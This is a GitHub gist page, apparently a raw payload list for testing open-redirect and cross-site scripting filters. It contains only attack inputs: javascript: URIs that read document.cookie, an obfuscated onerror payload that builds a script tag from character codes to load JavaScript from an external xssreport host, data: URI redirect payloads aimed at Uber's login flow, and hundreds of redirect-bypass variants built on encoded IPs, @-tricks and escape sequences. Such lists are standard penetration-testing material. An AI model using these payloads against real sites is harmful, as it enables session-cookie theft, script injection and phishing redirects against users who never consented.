Last active
November 5, 2019 08:50
-
-
Save nani1337/d9e064703252aa03cedb6f4c55dc8a48 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:alert(document.domain);void(0) | |
javascript:alert(document.cookie);void(0) | |
javascript:alert(location.href);void(0) | |
javascript:x=new Image();x.src=”Xss Platform”; | |
http://onerror=location=/javascript:console.log%28document.cookie%29/.source//a[/img][url]http://a.co[/url] | |
javascript://a/research?%0d%0aprompt(1,document.head.innerHTML) | |
http://x"><img src='x' onerror='alert(1);var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,114,101,112,111,114,116,46,115,105,110,97,97,112,112,46,99,111,109,47,116,47,49,46,106,115);document.body.appendChild(s);'/><a href=" | |
https:google.com | |
//google%E3%80%82com | |
\/\/google.com/ | |
/\/google.com/ | |
//google%00.com | |
http://www.theirsite.com@yoursite.com/ | |
data:accounts.uber.com%3Btext/html%3Bcharset=UTF-8,%3Chtml%3E%3Cscript%20src=%22https://app-lon02.marketo.com/index.php/form/getKnownLead?callback=alert(document.domain)%3B//%22%20data-reactid=%22341%22%3E%3C/script%3E%3C%2Fhtml%3E%26state%3Dx | |
https://auth.uber.com/login/?next_url=data:accounts.uber.com%3Btext/html%3Bcharset=UTF-8,%3Chtml%3E%3Cscript%20src=%22https://app-lon02.marketo.com/index.php/form/getKnownLead?callback=alert(document.domain)%3B//%22%20data-reactid=%22341%22%3E%3C/script%3E%3C%2Fhtml%3E%26state%3Dx&state=x | |
data:accounts.uber.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E&state=x | |
data:accounts.uber.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E&state=x | |
data:accounts.uber.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Ewindow.location%3D%22https%3A%2F%2Freddit.com%22%3B%3C%2Fscript%3E%3C%2Fhtml%3E&state=x | |
jaVaScript://accounts.uber.com/%0a%0dalert(1)//%2Fprofile%2F&state=CISjEn7fDHVmQybjIOq_ZfPU8cVhJh9mOSsme-LYJUo%3D | |
javascript:alert(document.domain);void(0) | |
javascript:alert(document.cookie);void(0) | |
javascript:alert(location.href);void(0) | |
javascript:x=new Image();x.src=Xss Platform; | |
http://onerror=location=/javascript:console.log%28document.cookie%29/.source//a[/img][url]http://a.co[/url] | |
javascript://a/research?%0d%0aprompt(1,document.head.innerHTML) | |
http://x"><img src='x' onerror='alert(1);var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,114,101,112,111,114,116,46,115,105,110,97,97,112,112,46,99,111,109,47,116,47,49,46,106,115);document.body.appendChild(s);'/><a href=" | |
https:google.com | |
//google%E3%80%82com | |
\/\/google.com/ | |
/\/google.com/ | |
//google%00.com | |
http://www.theirsite.com@yoursite.com/ | |
data:accounts.uber.com%3Btext/html%3Bcharset=UTF-8,%3Chtml%3E%3Cscript%20src=%22https://app-lon02.marketo.com/index.php/form/getKnownLead?callback=alert(document.domain)%3B//%22%20data-reactid=%22341%22%3E%3C/script%3E%3C%2Fhtml%3E%26state%3Dx | |
https://auth.uber.com/login/?next_url=data:accounts.uber.com%3Btext/html%3Bcharset=UTF-8,%3Chtml%3E%3Cscript%20src=%22https://app-lon02.marketo.com/index.php/form/getKnownLead?callback=alert(document.domain)%3B//%22%20data-reactid=%22341%22%3E%3C/script%3E%3C%2Fhtml%3E%26state%3Dx&state=x | |
data:accounts.uber.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E&state=x | |
data:accounts.uber.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E&state=x | |
data:accounts.uber.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Ewindow.location%3D%22https%3A%2F%2Freddit.com%22%3B%3C%2Fscript%3E%3C%2Fhtml%3E&state=x | |
jaVaScript://accounts.uber.com/%0a%0dalert(1)//%2Fprofile%2F&state=CISjEn7fDHVmQybjIOq_ZfPU8cVhJh9mOSsme-LYJUo%3D | |
//localdomain.pw/%2f.. | |
//www.whitelisteddomain.tld@localdomain.pw/%2f.. | |
///localdomain.pw/%2f.. | |
///www.whitelisteddomain.tld@localdomain.pw/%2f.. | |
////localdomain.pw/%2f.. | |
////www.whitelisteddomain.tld@localdomain.pw/%2f.. | |
https://localdomain.pw/%2f.. | |
https://www.whitelisteddomain.tld@localdomain.pw/%2f.. | |
/https://localdomain.pw/%2f.. | |
/https://www.whitelisteddomain.tld@localdomain.pw/%2f.. | |
//localdomain.pw/%2f%2e%2e | |
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
///localdomain.pw/%2f%2e%2e | |
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
////localdomain.pw/%2f%2e%2e | |
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
https://localdomain.pw/%2f%2e%2e | |
https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
/https://localdomain.pw/%2f%2e%2e | |
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
//localdomain.pw/ | |
//www.whitelisteddomain.tld@localdomain.pw/ | |
///localdomain.pw/ | |
///www.whitelisteddomain.tld@localdomain.pw/ | |
////localdomain.pw/ | |
////www.whitelisteddomain.tld@localdomain.pw/ | |
https://localdomain.pw/ | |
https://www.whitelisteddomain.tld@localdomain.pw/ | |
/https://localdomain.pw/ | |
/https://www.whitelisteddomain.tld@localdomain.pw/ | |
//localdomain.pw// | |
//www.whitelisteddomain.tld@localdomain.pw// | |
///localdomain.pw// | |
///www.whitelisteddomain.tld@localdomain.pw// | |
////localdomain.pw// | |
////www.whitelisteddomain.tld@localdomain.pw// | |
https://localdomain.pw// | |
https://www.whitelisteddomain.tld@localdomain.pw// | |
//https://localdomain.pw// | |
//https://www.whitelisteddomain.tld@localdomain.pw// | |
//localdomain.pw/%2e%2e%2f | |
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f | |
///localdomain.pw/%2e%2e%2f | |
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f | |
////localdomain.pw/%2e%2e%2f | |
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f | |
https://localdomain.pw/%2e%2e%2f | |
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f | |
//https://localdomain.pw/%2e%2e%2f | |
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f | |
///localdomain.pw/%2e%2e | |
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e | |
////localdomain.pw/%2e%2e | |
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e | |
https:///localdomain.pw/%2e%2e | |
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e | |
//https:///localdomain.pw/%2e%2e | |
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e | |
/https://localdomain.pw/%2e%2e | |
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e | |
///localdomain.pw/%2f%2e%2e | |
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
////localdomain.pw/%2f%2e%2e | |
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
https:///localdomain.pw/%2f%2e%2e | |
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
/https://localdomain.pw/%2f%2e%2e | |
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
/https:///localdomain.pw/%2f%2e%2e | |
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e | |
/%09/localdomain.pw | |
/%09/www.whitelisteddomain.tld@localdomain.pw | |
//%09/localdomain.pw | |
//%09/www.whitelisteddomain.tld@localdomain.pw | |
///%09/localdomain.pw | |
///%09/www.whitelisteddomain.tld@localdomain.pw | |
////%09/localdomain.pw | |
////%09/www.whitelisteddomain.tld@localdomain.pw | |
https://%09/localdomain.pw | |
https://%09/www.whitelisteddomain.tld@localdomain.pw | |
/%5clocaldomain.pw | |
/%5cwww.whitelisteddomain.tld@localdomain.pw | |
//%5clocaldomain.pw | |
//%5cwww.whitelisteddomain.tld@localdomain.pw | |
///%5clocaldomain.pw | |
///%5cwww.whitelisteddomain.tld@localdomain.pw | |
////%5clocaldomain.pw | |
////%5cwww.whitelisteddomain.tld@localdomain.pw | |
https://%5clocaldomain.pw | |
https://%5cwww.whitelisteddomain.tld@localdomain.pw | |
/https://%5clocaldomain.pw | |
/https://%5cwww.whitelisteddomain.tld@localdomain.pw | |
https://localdomain.pw | |
https://www.whitelisteddomain.tld@localdomain.pw | |
javascript:alert(1); | |
javascript:alert(1) | |
//javascript:alert(1); | |
/javascript:alert(1); | |
//javascript:alert(1) | |
/javascript:alert(1) | |
javascript:%0aalert`1` | |
/%5cjavascript:alert(1); | |
/%5cjavascript:alert(1) | |
//%5cjavascript:alert(1); | |
//%5cjavascript:alert(1) | |
/%09/javascript:alert(1); | |
/%09/javascript:alert(1) | |
java%0d%0ascript%0d%0a:alert(0) | |
//localdomain.pw | |
http:localdomain.pw | |
https:localdomain.pw | |
//localdomain%E3%80%82pw | |
\/\/localdomain.pw/ | |
/\/localdomain.pw/ | |
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/ | |
//\/localdomain.pw/ | |
//localdomain%00.pw | |
https://www.whitelisteddomain.tld/https://localdomain.pw/ | |
";alert(0);// | |
javascript://www.whitelisteddomain.tld?%a0alert%281%29 | |
http://0xd8.0x3a.0xd6.0xce | |
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce | |
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce | |
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce | |
http://0xd83ad6ce | |
http://www.whitelisteddomain.tld@0xd83ad6ce | |
http://3H6k7lIAiqjfNeN@0xd83ad6ce | |
http://XY>.7d8T\205pZM@0xd83ad6ce | |
http://3627734734 | |
http://www.whitelisteddomain.tld@3627734734 | |
http://3H6k7lIAiqjfNeN@3627734734 | |
http://XY>.7d8T\205pZM@3627734734 | |
http://472.314.470.462 | |
http://www.whitelisteddomain.tld@472.314.470.462 | |
http://3H6k7lIAiqjfNeN@472.314.470.462 | |
http://XY>.7d8T\205pZM@472.314.470.462 | |
http://0330.072.0326.0316 | |
http://www.whitelisteddomain.tld@0330.072.0326.0316 | |
http://3H6k7lIAiqjfNeN@0330.072.0326.0316 | |
http://XY>.7d8T\205pZM@0330.072.0326.0316 | |
http://00330.00072.0000326.00000316 | |
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316 | |
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 | |
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 | |
http://[::216.58.214.206] | |
http://www.whitelisteddomain.tld@[::216.58.214.206] | |
http://3H6k7lIAiqjfNeN@[::216.58.214.206] | |
http://XY>.7d8T\205pZM@[::216.58.214.206] | |
http://[::ffff:216.58.214.206] | |
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206] | |
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] | |
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] | |
http://0xd8.072.54990 | |
http://www.whitelisteddomain.tld@0xd8.072.54990 | |
http://3H6k7lIAiqjfNeN@0xd8.072.54990 | |
http://XY>.7d8T\205pZM@0xd8.072.54990 | |
http://0xd8.3856078 | |
http://www.whitelisteddomain.tld@0xd8.3856078 | |
http://3H6k7lIAiqjfNeN@0xd8.3856078 | |
http://XY>.7d8T\205pZM@0xd8.3856078 | |
http://00330.3856078 | |
http://www.whitelisteddomain.tld@00330.3856078 | |
http://3H6k7lIAiqjfNeN@00330.3856078 | |
http://XY>.7d8T\205pZM@00330.3856078 | |
http://00330.0x3a.54990 | |
http://www.whitelisteddomain.tld@00330.0x3a.54990 | |
http://3H6k7lIAiqjfNeN@00330.0x3a.54990 | |
http://XY>.7d8T\205pZM@00330.0x3a.54990 | |
http:0xd8.0x3a.0xd6.0xce | |
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce | |
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce | |
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce | |
http:0xd83ad6ce | |
http:www.whitelisteddomain.tld@0xd83ad6ce | |
http:3H6k7lIAiqjfNeN@0xd83ad6ce | |
http:XY>.7d8T\205pZM@0xd83ad6ce | |
http:3627734734 | |
http:www.whitelisteddomain.tld@3627734734 | |
http:3H6k7lIAiqjfNeN@3627734734 | |
http:XY>.7d8T\205pZM@3627734734 | |
http:472.314.470.462 | |
http:www.whitelisteddomain.tld@472.314.470.462 | |
http:3H6k7lIAiqjfNeN@472.314.470.462 | |
http:XY>.7d8T\205pZM@472.314.470.462 | |
http:0330.072.0326.0316 | |
http:www.whitelisteddomain.tld@0330.072.0326.0316 | |
http:3H6k7lIAiqjfNeN@0330.072.0326.0316 | |
http:XY>.7d8T\205pZM@0330.072.0326.0316 | |
http:00330.00072.0000326.00000316 | |
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316 | |
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 | |
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 | |
http:[::216.58.214.206] | |
http:www.whitelisteddomain.tld@[::216.58.214.206] | |
http:3H6k7lIAiqjfNeN@[::216.58.214.206] | |
http:XY>.7d8T\205pZM@[::216.58.214.206] | |
http:[::ffff:216.58.214.206] | |
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206] | |
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] | |
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] | |
http:0xd8.072.54990 | |
http:www.whitelisteddomain.tld@0xd8.072.54990 | |
http:3H6k7lIAiqjfNeN@0xd8.072.54990 | |
http:XY>.7d8T\205pZM@0xd8.072.54990 | |
http:0xd8.3856078 | |
http:www.whitelisteddomain.tld@0xd8.3856078 | |
http:3H6k7lIAiqjfNeN@0xd8.3856078 | |
http:XY>.7d8T\205pZM@0xd8.3856078 | |
http:00330.3856078 | |
http:www.whitelisteddomain.tld@00330.3856078 | |
http:3H6k7lIAiqjfNeN@00330.3856078 | |
http:XY>.7d8T\205pZM@00330.3856078 | |
http:00330.0x3a.54990 | |
http:www.whitelisteddomain.tld@00330.0x3a.54990 | |
http:3H6k7lIAiqjfNeN@00330.0x3a.54990 | |
http:XY>.7d8T\205pZM@00330.0x3a.54990 | |
1localdomain.pw | |
5localdomain.pw | |
localdomain.pw | |
ülocaldomain.pw | |
plocaldomain.pw | |
/1localdomain.pw | |
/5localdomain.pw | |
/localdomain.pw | |
/ülocaldomain.pw | |
/plocaldomain.pw | |
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77 | |
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77 | |
<>javascript:alert(1); | |
<>//localdomain.pw | |
//localdomain.pw\@www.whitelisteddomain.tld | |
https://:@localdomain.pw\@www.whitelisteddomain.tld | |
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) | |
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) | |
ja\nva\tscript\r:alert(1) | |
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) | |
\152\141\166\141\163\143\162\151\160\164\072alert(1) | |
http://localdomain.pw:80#@www.whitelisteddomain.tld/ | |
http://localdomain.pw:80?@www.whitelisteddomain.tld/ | |
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/ | |
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/ | |
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/ | |
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/ | |
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/ | |
http://localdomain.pw\twww.whitelisteddomain.tld/ | |
//localdomain.pw:80#@www.whitelisteddomain.tld/ | |
//localdomain.pw:80?@www.whitelisteddomain.tld/ | |
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/ | |
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/ | |
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/ | |
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/ | |
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/ | |
//localdomain.pw\twww.whitelisteddomain.tld/ | |
//;@localdomain.pw | |
http://;@localdomain.pw | |
@localdomain.pw | |
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1) | |
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= | |
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/ | |
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/ | |
http://localdomain.pw%3F.www.whitelisteddomain.tld/ | |
http://localdomain.pw%23.www.whitelisteddomain.tld/ | |
http://www.whitelisteddomain.tld:80%40localdomain.pw/ | |
http://www.whitelisteddomain.tld%2elocaldomain.pw/ | |
/x:1/:///%01javascript:alert(document.cookie)/ | |
/https:/%5clocaldomain.pw/ | |
https:/%5clocaldomain.pw/ | |
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) | |
javascripT://www.whitelisteddomain.tld/%250d%250aalert(document.cookie) | |
/http://localdomain.pw | |
/%2f%2flocaldomain.pw | |
//%2f%2flocaldomain.pw | |
/localdomain.pw/%2f%2e%2e | |
/http:/localdomain.pw | |
http:/localdomain.pw | |
/.localdomain.pw | |
http://.localdomain.pw | |
.localdomain.pw | |
///\;@localdomain.pw | |
///localdomain.pw | |
/////localdomain.pw/ | |
/////localdomain.pw | |
java%0ascript:alert(1) | |
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1) | |
java%09script:alert(1) | |
java%0dscript:alert(1) | |
javascript://%0aalert(1) | |
javascript://%0aalert`1` | |
Javas%26%2399;ript:alert(1) | |
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html> | |
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);// | |
http://www.localdomain.pw\.www.whitelisteddomain.tld | |
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529 | |
%01https://localdomain.pw | |
www.whitelisteddomain.tld;@localdomain.pw | |
https://www.whitelisteddomain.tld;@localdomain.pw | |
http:%0a%0dlocaldomain.pw | |
https://%0a%0dlocaldomain.pw | |
localdomain.pw/www.whitelisteddomain.tld | |
https://localdomain.pw/www.whitelisteddomain.tld | |
//localdomain.pw/www.whitelisteddomain.tld | |
//Á5(5ð5 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment